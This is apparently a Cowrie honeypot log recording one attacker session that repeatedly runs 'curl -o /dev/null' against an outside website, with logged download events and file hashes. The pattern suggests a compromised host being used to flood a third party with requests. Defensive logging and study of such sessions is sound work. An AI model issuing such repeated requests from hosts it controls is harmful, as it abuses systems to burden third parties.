{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:36.770360Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.771142Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:36.808868Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.809741Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.842872Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:36.847188Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.847855Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:36.886394Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.887187Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.892538Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:36.924799Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.996469Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.000684Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:37.038754Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.039387Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.063025Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:37.087412Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.088231Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:37.125675Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.126953Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:37.164185Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.165031Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:37.203035Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.203831Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:37.242513Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.243299Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.279031Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:37.281570Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.282566Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:37.321340Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.322076Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.337053Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:37.360061Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.360754Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:37.407036Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.407756Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.444320Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:37.445507Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.445913Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.456119Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:37.493197Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.493882Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:37.530557Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.531230Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:37.568457Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.569214Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:37.606362Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.607034Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:37.644487Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.645303Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.670382Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:37.683076Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.683811Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:37.731022Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.731901Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.758373Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:37.771335Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.772081Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:37.809114Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.809966Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:37.849611Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.850433Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:37.901684Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.902524Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.918137Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:37.951710Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.952544Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.968201Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:37.991127Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:37.991904Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:38.029477Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:38.030290Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:38.116854Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:38.117774Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:38.155442Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:38.156289Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:38.194505Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:38.195278Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:38.232745Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:38.233540Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:38.274537Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:38.275327Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:38.299216Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:38.312567Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:38.313409Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:38.360688Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:38.361555Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:38.399282Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:38.400114Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:38.429804Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:38.439389Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:38.440503Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:38.486860Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:38.487840Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:38.524966Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:38.525654Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:38.564239Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:38.564927Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:38.598757Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:38.603048Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
